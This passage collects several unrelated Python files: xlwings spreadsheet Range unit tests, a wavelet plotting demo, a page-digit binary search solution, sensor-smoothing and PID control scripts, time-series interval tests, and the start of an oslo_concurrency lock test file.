3)).get_address(include_sheetname=True) self.assertEqual(res, "'Sheet1'!$A$1:$C$3") res = wb1.sheets[1].range((1, 1), (3, 3)).get_address(include_sheetname=True) self.assertEqual(res, "'Sheet2'!$A$1:$C$3") res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(external=True) self.assertEqual(res, "'[test book.xlsx]Sheet1'!$A$1:$C$3") def test_address(self): self.assertEqual(self.wb1.sheets[0].range('A1:B2').address, '$A$1:$B$2') def test_current_region(self): values = [[1., 2.], [3., 4.]] self.wb1.sheets[0].range('A20').value = values self.assertEqual(self.wb1.sheets[0].range('B21').current_region.value, values) def test_autofit_range(self): self.wb1.sheets[0].range('A1:D4').value = 'test_string' 
self.wb1.sheets[0].range('A1:D4').row_height = 40 self.wb1.sheets[0].range('A1:D4').column_width = 40 self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').row_height) self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').column_width) self.wb1.sheets[0].range('A1:D4').autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').column_width) self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').row_height) self.wb1.sheets[0].range('A1:D4').row_height = 40 self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').row_height) self.wb1.sheets[0].range('A1:D4').rows.autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').row_height) self.wb1.sheets[0].range('A1:D4').column_width = 40 self.assertEqual(40, self.wb1.sheets[0].range('A1:D4').column_width) self.wb1.sheets[0].range('A1:D4').columns.autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A1:D4').column_width) self.wb1.sheets[0].range('A1:D4').rows.autofit() self.wb1.sheets[0].range('A1:D4').columns.autofit() def test_autofit_col(self): self.wb1.sheets[0].range('A1:D4').value = 'test_string' self.wb1.sheets[0].range('A:D').column_width = 40 self.assertEqual(40, self.wb1.sheets[0].range('A:D').column_width) self.wb1.sheets[0].range('A:D').autofit() self.assertTrue(40 != self.wb1.sheets[0].range('A:D').column_width) # Just checking if they don't throw an error self.wb1.sheets[0].range('A:D').rows.autofit() self.wb1.sheets[0].range('A:D').columns.autofit() def test_autofit_row(self): self.wb1.sheets[0].range('A1:D4').value = 'test_string' self.wb1.sheets[0].range('1:10').row_height = 40 self.assertEqual(40, self.wb1.sheets[0].range('1:10').row_height) self.wb1.sheets[0].range('1:10').autofit() self.assertTrue(40 != self.wb1.sheets[0].range('1:10').row_height) # Just checking if they don't throw an error self.wb1.sheets[0].range('1:1000000').rows.autofit() self.wb1.sheets[0].range('1:1000000').columns.autofit() def test_color(self): rgb = (30, 100, 200) self.wb1.sheets[0].range('A1').color = rgb self.assertEqual(rgb, self.wb1.sheets[0].range('A1').color) self.wb1.sheets[0].range('A2').color = RgbColor.rgbAqua self.assertEqual((0, 255, 255), self.wb1.sheets[0].range('A2').color) self.wb1.sheets[0].range('A2').color = None self.assertEqual(self.wb1.sheets[0].range('A2').color, None) self.wb1.sheets[0].range('A1:D4').color = rgb self.assertEqual(rgb, self.wb1.sheets[0].range('A1:D4').color) def test_len_rows(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').rows), 4) def test_count_rows(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').rows), self.wb1.sheets[0].range('A1:C4').rows.count) def test_len_cols(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').columns), 3) def test_count_cols(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4').columns), self.wb1.sheets[0].range('A1:C4').columns.count) def test_shape(self): self.assertEqual(self.wb1.sheets[0].range('A1:C4').shape, (4, 3)) def test_size(self): self.assertEqual(self.wb1.sheets[0].range('A1:C4').size, 12) def test_table(self): data = [[1, 2.222, 3.333], ['Test1', None, 'éöà'], [datetime(1962, 11, 3), datetime(2020, 12, 31, 12, 12, 20), 9.999]] self.wb1.sheets[0].range('A1').value = data if sys.platform.startswith('win') and self.wb1.app.version == '14.0': self.wb1.sheets[0].range('A3:B3').number_format = 'dd/mm/yyyy' # Hack for Excel 2010 bug, see GH #43 cells = self.wb1.sheets[0].range('A1').expand('table').value self.assertEqual(cells, data) def test_vertical(self): data = [[1, 2.222, 3.333], ['Test1', None, 'éöà'], 
[datetime(1962, 11, 3), datetime(2020, 12, 31, 12, 12, 20), 9.999]] self.wb1.sheets[0].range('A10').value = data if sys.platform.startswith('win') and self.wb1.app.version == '14.0': self.wb1.sheets[0].range('A12:B12').number_format = 'dd/mm/yyyy' # Hack for Excel 2010 bug, see GH #43 cells = self.wb1.sheets[0].range('A10').expand('vertical').value self.assertEqual(cells, [row[0] for row in data]) cells = self.wb1.sheets[0].range('A10').expand('d').value self.assertEqual(cells, [row[0] for row in data]) cells = self.wb1.sheets[0].range('A10').expand('down').value self.assertEqual(cells, [row[0] for row in data]) def test_horizontal(self): data = [[1, 2.222, 3.333], ['Test1', None, 'éöà'], [datetime(1962, 11, 3), datetime(2020, 12, 31, 12, 12, 20), 9.999]] self.wb1.sheets[0].range('A20').value = data cells = self.wb1.sheets[0].range('A20').expand('horizontal').value self.assertEqual(cells, data[0]) cells = self.wb1.sheets[0].range('A20').expand('r').value self.assertEqual(cells, data[0]) cells = self.wb1.sheets[0].range('A20').expand('right').value self.assertEqual(cells, data[0]) def test_hyperlink(self): address = 'www.xlwings.org' # Naked address self.wb1.sheets[0].range('A1').add_hyperlink(address) self.assertEqual(self.wb1.sheets[0].range('A1').value, address) hyperlink = self.wb1.sheets[0].range('A1').hyperlink if not hyperlink.endswith('/'): hyperlink += '/' self.assertEqual(hyperlink, 'http://' + address + '/') # Address + FriendlyName self.wb1.sheets[0].range('A2').add_hyperlink(address, 'test_link') self.assertEqual(self.wb1.sheets[0].range('A2').value, 'test_link') hyperlink = self.wb1.sheets[0].range('A2').hyperlink if not hyperlink.endswith('/'): hyperlink += '/' self.assertEqual(hyperlink, 'http://' + address + '/') def test_hyperlink_formula(self): self.wb1.sheets[0].range('B10').formula = '=HYPERLINK("http://xlwings.org", "xlwings")' self.assertEqual(self.wb1.sheets[0].range('B10').hyperlink, 'http://xlwings.org') def test_insert_cell(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('A1').insert() self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('A2').value, 'test') def test_insert_row(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('1:1').insert() self.assertEqual(self.wb1.sheets[0].range('A1:C1').value, [None, None, None]) self.assertEqual(self.wb1.sheets[0].range('A2:C2').value, ['test', 'test', 'test']) def test_insert_column(self): self.wb1.sheets[0].range('A1:A3').value = 'test' self.wb1.sheets[0].range('A:A').insert() self.assertEqual(self.wb1.sheets[0].range('A1:A3').value, [None, None, None]) self.assertEqual(self.wb1.sheets[0].range('B1:B3').value, ['test', 'test', 'test']) def test_insert_cell_shift_down(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('A1').insert(shift='down') self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('A2').value, 'test') def test_insert_cell_shift_right(self): self.wb1.sheets[0].range('A1:C1').value = 'test' self.wb1.sheets[0].range('A1').insert(shift='right') self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('B1:D1').value, ['test', 'test', 'test']) def test_delete_cell(self): self.wb1.sheets[0].range('A1').value = ['one', 'two', 'three'] self.wb1.sheets[0].range('A1').delete() self.assertIsNone(self.wb1.sheets[0].range('C1').value) self.assertEqual(self.wb1.sheets[0].range('A1').value, 'two') def 
test_delete_row(self): self.wb1.sheets[0].range('A1:C1').value = 'one' self.wb1.sheets[0].range('A2:C2').value = 'two' self.wb1.sheets[0].range('1:1').delete() self.assertEqual(self.wb1.sheets[0].range('A1:C1').value, ['two', 'two', 'two']) self.assertEqual(self.wb1.sheets[0].range('A2:C2').value, [None, None, None]) def test_delete_column(self): self.wb1.sheets[0].range('A1:A1').value = 'one' self.wb1.sheets[0].range('B1:B2').value = 'two' self.wb1.sheets[0].range('C1:C2').value = 'two' self.wb1.sheets[0].range('A:A').delete() self.assertEqual(self.wb1.sheets[0].range('C1:C2').value, [None, None]) self.assertEqual(self.wb1.sheets[0].range('A1:A2').value, ['two', 'two']) def test_delete_cell_shift_up(self): self.wb1.sheets[0].range('A1').value = ['one', 'two', 'three'] self.wb1.sheets[0].range('A1').delete('up') self.assertIsNone(self.wb1.sheets[0].range('A1').value) self.assertEqual(self.wb1.sheets[0].range('B1:C1').value, ['two', 'three']) def test_delete_cell_shift_left(self): self.wb1.sheets[0].range('A1').value = ['one', 'two', 'three'] self.wb1.sheets[0].range('A1').delete('left') self.assertIsNone(self.wb1.sheets[0].range('C1').value) self.assertEqual(self.wb1.sheets[0].range('A1').value, 'two') def test_copy_destination(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').copy(destination=sheet.range('A2')) self.assertEqual(sheet.range('A1:B1').value, sheet.range('A2:B2').value) def test_copy_clipboard(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').copy() def test_paste(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').color = (34, 34, 34) sheet.range('A1:B1').copy() sheet.range('A2').paste() self.assertEqual(sheet['A1:B1'].value, sheet['A2:B2'].value) self.assertEqual(sheet['A1:B1'].color, sheet['A2:B2'].color) def test_paste_values(self): sheet = self.wb1.sheets[0] sheet.range('A1:B1').value = 'test' sheet.range('A1:B1').color = (34, 34, 34) sheet.range('A1:B1').copy() sheet.range('A2').paste(paste='values') self.assertEqual(sheet['A1:B1'].value, sheet['A2:B2'].value) self.assertNotEqual(sheet['A1:B1'].color, sheet['A2:B2'].color) def test_resize(self): r = self.wb1.sheets[0].range('A1').resize(4, 5) self.assertEqual(r.address, '$A$1:$E$4') r = self.wb1.sheets[0].range('A1').resize(row_size=4) self.assertEqual(r.address, '$A$1:$A$4') r = self.wb1.sheets[0].range('A1:B4').resize(column_size=5) self.assertEqual(r.address, '$A$1:$E$4') r = self.wb1.sheets[0].range('A1:B4').resize(row_size=5) self.assertEqual(r.address, '$A$1:$B$5') r = self.wb1.sheets[0].range('A1:B4').resize() self.assertEqual(r.address, '$A$1:$B$4') r = self.wb1.sheets[0].range('A1:C5').resize(row_size=1) self.assertEqual(r.address, '$A$1:$C$1') with self.assertRaises(AssertionError): self.wb1.sheets[0].range('A1:B4').resize(row_size=0) with self.assertRaises(AssertionError): self.wb1.sheets[0].range('A1:B4').resize(column_size=0) def test_offset(self): o = self.wb1.sheets[0].range('A1:B3').offset(3, 4) self.assertEqual(o.address, '$E$4:$F$6') o = self.wb1.sheets[0].range('A1:B3').offset(row_offset=3) self.assertEqual(o.address, '$A$4:$B$6') o = self.wb1.sheets[0].range('A1:B3').offset(column_offset=4) self.assertEqual(o.address, '$E$1:$F$3') def test_last_cell(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').last_cell.row, 5) self.assertEqual(self.wb1.sheets[0].range('B3:F5').last_cell.column, 6) def test_select(self): self.wb2.sheets[0].range('C10').select() 
self.assertEqual(self.app2.selection.address, self.wb2.sheets[0].range('C10').address) def test_wrap_text(self): self.assertFalse(self.wb1.sheets[0]['A1'].wrap_text) self.wb1.sheets[0]['A1'].wrap_text = True self.assertTrue(self.wb1.sheets[0]['A1'].wrap_text) class TestRangeIndexing(TestBase): # 2d Range def test_index1(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r[0].address, '$A$1') self.assertEqual(r(1).address, '$A$1') self.assertEqual(r[0, 0].address, '$A$1') self.assertEqual(r(1, 1).address, '$A$1') def test_index2(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r[1].address, '$B$1') self.assertEqual(r(2).address, '$B$1') self.assertEqual(r[0, 1].address, '$B$1') self.assertEqual(r(1, 2).address, '$B$1') def test_index3(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:B2') a = r[4].address def test_index4(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r(5).address, '$A$3') def test_index5(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:B2') a = r[0, 4].address def test_index6(self): r = self.wb1.sheets[0].range('A1:B2') self.assertEqual(r(1, 5).address, '$E$1') # Row def test_index1row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r[0].address, '$A$1') self.assertEqual(r(1).address, '$A$1') self.assertEqual(r[0, 0].address, '$A$1') self.assertEqual(r(1, 1).address, '$A$1') def test_index2row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r[1].address, '$B$1') self.assertEqual(r(2).address, '$B$1') self.assertEqual(r[0, 1].address, '$B$1') self.assertEqual(r(1, 2).address, '$B$1') def test_index3row(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:D1') a = r[4].address def test_index4row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r(5).address, '$A$2') def test_index5row(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:D1') a = r[0, 4].address def test_index6row(self): r = self.wb1.sheets[0].range('A1:D1') self.assertEqual(r(1, 5).address, '$E$1') # Column def test_index1col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r[0].address, '$A$1') self.assertEqual(r(1).address, '$A$1') self.assertEqual(r[0, 0].address, '$A$1') self.assertEqual(r(1, 1).address, '$A$1') def test_index2col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r[1].address, '$A$2') self.assertEqual(r(2).address, '$A$2') self.assertEqual(r[1, 0].address, '$A$2') self.assertEqual(r(2, 1).address, '$A$2') def test_index3col(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:A4') a = r[4].address def test_index4col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r(5).address, '$A$5') def test_index5col(self): with self.assertRaises(IndexError): r = self.wb1.sheets[0].range('A1:A4') a = r[4, 0].address def test_index6col(self): r = self.wb1.sheets[0].range('A1:A4') self.assertEqual(r(5, 1).address, '$A$5') class TestRangeSlicing(TestBase): # 2d Range def test_slice1(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[0:, 1:].address, '$C$2:$D$4') def test_slice2(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[1:2, 1:2].address, '$C$3') def test_slice3(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[:1, :2].address, '$B$2:$C$2') def test_slice4(self): r = self.wb1.sheets[0].range('B2:D4') self.assertEqual(r[:, :].address, '$B$2:$D$4') # Row def test_slice1row(self): r = self.wb1.sheets[0].range('B2:D2') 
self.assertEqual(r[1:].address, '$C$2:$D$2') def test_slice2row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[1:2].address, '$C$2') def test_slice3row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[:2].address, '$B$2:$C$2') def test_slice4row(self): r = self.wb1.sheets[0].range('B2:D2') self.assertEqual(r[:].address, '$B$2:$D$2') # Column def test_slice1col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[1:].address, '$B$3:$B$4') def test_slice2col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[1:2].address, '$B$3') def test_slice3col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[:2].address, '$B$2:$B$3') def test_slice4col(self): r = self.wb1.sheets[0].range('B2:B4') self.assertEqual(r[:].address, '$B$2:$B$4') class TestRangeShortcut(TestBase): def test_shortcut1(self): self.assertEqual(self.wb1.sheets[0]['A1'], self.wb1.sheets[0].range('A1')) def test_shortcut2(self): self.assertEqual(self.wb1.sheets[0]['A1:B5'], self.wb1.sheets[0].range('A1:B5')) def test_shortcut3(self): self.assertEqual(self.wb1.sheets[0][0, 1], self.wb1.sheets[0].range('B1')) def test_shortcut4(self): self.assertEqual(self.wb1.sheets[0][:5, :5], self.wb1.sheets[0].range('A1:E5')) def test_shortcut5(self): with self.assertRaises(TypeError): r = self.wb1.sheets[0]['A1', 'B5'] def test_shortcut6(self): with self.assertRaises(TypeError): r = self.wb1.sheets[0][self.wb1.sheets[0]['A1'], 'B5'] def test_shortcut7(self): with self.assertRaises(TypeError): r = self.wb1.sheets[0]['A1', self.wb1.sheets[0]['B5']] class TestRangeExpansion(TestBase): def test_table(self): sht = self.wb1.sheets[0] rng = sht[0, 0] rng.value = [['a'] * 5] * 5 self.assertEqual(rng.options(expand='table').value, [['a'] * 5] * 5) def test_vertical(self): sht = self.wb1.sheets[0] rng = sht[0, 0:3] sht[0, 0].value = [['a'] * 3] * 5 self.assertEqual(rng.options(expand='down').value, [['a'] * 3] * 5) def test_horizontal(self): sht = self.wb1.sheets[0] rng = sht[0:5, 0] sht[0, 0].value = [['a'] * 3] * 5 self.assertEqual(rng.options(expand='right').value, [['a'] * 3] * 5) class TestCellErrors(TestBase): def test_cell_erros(self): wb = xw.Book('cell_errors.xlsx') sheet = wb.sheets[0] for i in range(1, 8): self.assertIsNone(sheet.range((i, 1)).value) wb.close() class TestMerging(TestBase): def test_merge(self): sheet = self.wb1.sheets[0] self.assertEqual(sheet['A1'].merge_area, sheet['A1']) self.assertEqual(sheet['A1'].merge_cells, False) sheet["A1:A2"].merge() self.assertEqual(sheet['A1'].merge_area, sheet['A1:A2']) self.assertEqual(sheet['A1'].merge_cells, True) sheet["A1:B2"].merge() self.assertEqual(sheet['A1'].merge_area, sheet['A1:B2']) sheet["A1:B2"].unmerge() self.assertEqual(sheet['A1'].merge_area, sheet['A1']) sheet["A1:B2"].merge(True) self.assertEqual(sheet['A1'].merge_area, sheet['A1:B1']) if __name__ == '__main__': unittest.main()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- import pylab import numpy import Image # PIL from supreme.lib import pywt im = Image.open("data/aero.png").convert('L') arr = numpy.fromstring(im.tostring(), numpy.uint8) arr.shape = (im.size[1], im.size[0]) pylab.imshow(arr, interpolation="nearest", cmap=pylab.cm.gray) for LL, (LH, HL, HH) in pywt.swt2(arr, 'bior1.3', level=3, start_level=0): pylab.figure() for i,a in enumerate([LL, LH, HL, HH]): pylab.subplot(2,2,i+1) pylab.imshow(a, origin='image', interpolation="nearest", cmap=pylab.cm.gray) pylab.show()
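# Editorial note (not part of the original example): each element yielded by pywt.swt2
# above is unpacked as (LL, (LH, HL, HH)), i.e. one approximation image plus three
# detail images per decomposition level, and the inner loop draws those four arrays
# in a 2x2 grid for that level.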
python
import sys import math def count_digit(p1, p2): l1 = len(str(p1)) l2 = len(str(p2)) count = 0 for i in range(l1, l2+1): if i == l1: st = p1 else: st = 10**(i-1) if i == l2: ed = p2 else: ed = 10**i - 1 count += (ed - st + 1) * i return count def dichotomic_search(p1, p2, target): pin = p1 pout = p2 p = p1 while pout - pin > 1: p = (pin + pout) // 2 count = count_digit(p1, p) if count == target: return p elif count < target: pin = p else: pout = p p = p - 1 return p n = int(input()) for i in range(n): st, ed = [int(j) for j in input().split()] target_count = count_digit(st, ed) // 2 page = dichotomic_search(st, ed, target_count) print(page)
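# Editorial example (not part of the original solution): count_digit(p1, p2) counts the
# total number of digits used to print page numbers p1..p2. For instance
# count_digit(1, 12) = 9*1 + 3*2 = 15 (pages 1-9 contribute one digit each, pages 10-12
# two digits each). dichotomic_search then binary-searches for the page at which the
# running digit count reaches half of the total.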
python
from utils import pandaman, handyman from feature_extraction import data_loader from feature_extraction import feature_preprocessor import numpy as np import pandas as pd import os import matplotlib.pyplot as plt plt.style.use('ggplot') if __name__ == '__main__': train_data, test_data = data_loader.create_flat_intervals_structure() # print(os.path.join(".", "moving_avg_data.pkl")) # train_data_mvng_avg = feature_preprocessor.reduce_noise(train_data.copy(), "moving_avg") # handyman.dump_pickle(train_data_mvng_avg, os.path.join(".", "moving_avg_data.pkl")) # train_data_butter = feature_preprocessor.reduce_noise(train_data.copy(), "butter") # handyman.dump_pickle(train_data_butter, os.path.join(".", "butter_data.pkl")) # train_data_gaussian = feature_preprocessor.reduce_noise(train_data.copy(), "guassian") # handyman.dump_pickle(train_data_gaussian, os.path.join(".", "gaussian_data.pkl")) train_data_rolling = handyman.load_pickle(os.path.join(".", "rolling_data.pkl")) train_data_mvng_avg = handyman.load_pickle(os.path.join(".", "moving_avg_data.pkl")) train_data_butter = handyman.load_pickle(os.path.join(".", "butter_data.pkl")) train_data_gaussian = handyman.load_pickle(os.path.join(".", "gaussian_data.pkl")) plt.figure() plt.plot(np.arange(0,2,0.01), train_data.loc[20, "interval_data"].iloc[:, 0], label='Before smoothing', color='blue', linestyle=':', linewidth=2) plt.plot(np.arange(0,2,0.01), train_data_butter.loc[20, "interval_data"].iloc[:, 0], label='Butterworth', color='red', linewidth=1) plt.plot(np.arange(0,2,0.01), train_data_gaussian.loc[20, "interval_data"].iloc[:, 0], label='Gaussian', color='yellow', linewidth=1) plt.plot(np.arange(0,2,0.01), train_data_rolling.loc[20, "interval_data"].iloc[:, 0], label='Rolling average', color='green', linewidth=1) plt.title("Acceloremeter X before and after smoothing") plt.legend(loc="lower right") plt.show()
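# Editorial note (not part of the original script): np.arange(0, 2, 0.01) produces 200
# x-values, so each plotted interval appears to span 2 seconds sampled at 100 Hz
# (inferred from the plotting code above, not from the data loader itself).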
python
import numpy as np import pandas as pd import pytest from dku_timeseries import IntervalRestrictor from recipe_config_loading import get_interval_restriction_params @pytest.fixture def datetime_column(): return "Date" @pytest.fixture def df(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2] country = ["first", "first", "second", "second"] time_index = pd.date_range("1-1-1959", periods=4, freq="M") df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, datetime_column: time_index}) return df @pytest.fixture def long_df(datetime_column): co2 = [315.58, 316.39, 100, 116.2, 345, 234, 201, 100] country = ["first", "first", "first", "first", "second", "second", "second", "second"] time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, datetime_column: time_index}) return df @pytest.fixture def long_df_2(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2, 9, 10] country = ["first", "first", "second", "second", "third", "third"] country_2 = ["first", "first", "second", "second", "third", "third"] time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append( pd.date_range("1-1-1959", periods=2, freq="M")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, "item": country_2, datetime_column: time_index}) return df @pytest.fixture def long_df_3(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2, 9, 319, 250, 300] country = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"] country_2 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"] country_3 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"] time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append( pd.date_range("1-1-1959", periods=2, freq="M")).append(pd.date_range("1-1-1959", periods=2, freq="M")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, "item": country_2, "store": country_3, datetime_column: time_index}) return df @pytest.fixture def long_df_4(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2, 9, 319, 250, 300] country = ["first", "first", "second", "second", "third", "third", "first", "first"] country_2 = ["first", "first", "second", "second", "third", "third", "second", "first"] country_3 = ["first", "first", "second", "second", "third", "third", "third", "fourth"] time_index = pd.date_range("1-1-2020", periods=2, freq="M").append(pd.date_range("1-1-2020", periods=2, freq="M")).append( pd.date_range("1-1-2020", periods=2, freq="M")).append(pd.date_range("1-1-2020", periods=2, freq="M")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, "item": country_2, "store": country_3, datetime_column: time_index}) return df @pytest.fixture def long_df_numerical(datetime_column): co2 = [315.58, 316.39, 100, 116.2, 345, 234, 201, 100] country = [1, 1, 1, 1, 2, 2, 2, 2] time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, datetime_column: time_index}) return df @pytest.fixture def recipe_config(datetime_column): config = {u'groupby_columns': [u'country'], u'max_threshold': 320, u'min_threshold': 200, u'datetime_column': u'Date', 
u'advanced_activated': True, u'time_unit': u'days', u'min_deviation_duration_value': 0, u'value_column': u'value1', u'min_valid_values_duration_value': 0} return config @pytest.fixture def threshold_dict(recipe_config): min_threshold = recipe_config.get('min_threshold') max_threshold = recipe_config.get('max_threshold') value_column = recipe_config.get('value_column') threshold_dict = {value_column: (min_threshold, max_threshold)} return threshold_dict @pytest.fixture def params(recipe_config): return get_interval_restriction_params(recipe_config) class TestIntervalLongFormat: def test_long_format(self, long_df, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-01T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-03T00:00:00.000000000'])) def test_two_identifiers(self, long_df_2, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country", "item"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_2, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000'])) def test_three_identifiers(self, long_df_3, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country", "item", "store"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_3, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-02-28T00:00:00.000000000'])) def test_mix_identifiers(self, long_df_4, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country", "item", "store"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_4, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['2020-01-31T00:00:00.000000000', '2020-02-29T00:00:00.000000000', '2020-02-29T00:00:00.000000000', '2020-01-31T00:00:00.000000000', '2020-01-31T00:00:00.000000000', '2020-02-29T00:00:00.000000000', '2020-02-29T00:00:00.000000000'])) def test_empty_identifiers(self, df, params, recipe_config, threshold_dict, datetime_column): interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(df, datetime_column, threshold_dict, groupby_columns=[]) assert output_df.shape == (4, 5) output_df = interval_restrictor.compute(df, datetime_column, threshold_dict) assert output_df.shape == (4, 5) output_df = interval_restrictor.compute(df, datetime_column, threshold_dict, groupby_columns=None) assert output_df.shape == (4, 5) def test_long_format_numerical(self, long_df_numerical, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country"] interval_restrictor = IntervalRestrictor(params) output_df = 
interval_restrictor.compute(long_df_numerical, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-01T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-03T00:00:00.000000000'])) np.testing.assert_array_equal(output_df.country.values, np.array([1, 1, 2, 2]))
python
# Dan Thayer
# PID control for a servo motor and distance sensor... just messing around
from range_sensor import measure_distance

# PID gains
k_p = 1.0
k_d = 1.0
k_i = 0.001


def run(target_dist, debug=False):
    """
    Sense distance and drive the motor towards a given target.
    :param target_dist: target distance in cm
    :param debug: if True, print the error terms and control signal on each loop
    :return: never returns (runs the control loop forever)
    """
    sum_err = 0.0
    last_err = 0.0
    while 1:
        dist = measure_distance()
        err = target_dist - dist
        sum_err += err
        signal = k_p*err + k_i*sum_err + k_d*(err-last_err)
        control(signal)
        last_err = err
        if debug:
            print("dist={}, err={}, sum={}, signal={}".format(dist, err, sum_err, signal))


def control(signal):
    # Placeholder actuator: just log the control signal (renamed from `input`
    # to avoid shadowing the built-in)
    print("control w/ input ", signal)


if __name__ == "__main__":
    print("starting control loop...")
    run(target_dist=4.0, debug=True)
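# Editorial note (not part of the original script): the loop in run() is a textbook
# discrete PID law, signal = k_p*err + k_i*sum(err) + k_d*(err - last_err), with
# err = target_dist - measured distance. Hand-traced with the gains above and a
# constant error of 1.0, the first three signals would be 2.001, 1.002 and 1.003
# (the derivative term vanishes after the first step, the integral term grows slowly).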
python
# Copyright 2011 Justin Santa Barbara # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import multiprocessing import os import shutil import signal import subprocess import sys import tempfile import threading import time from oslo_config import cfg from oslotest import base as test_base import six from oslo_concurrency.fixture import lockutils as fixtures from oslo_concurrency import lockutils from oslo_config import fixture as config if sys.platform == 'win32': import msvcrt else: import fcntl def lock_file(handle): if sys.platform == 'win32': 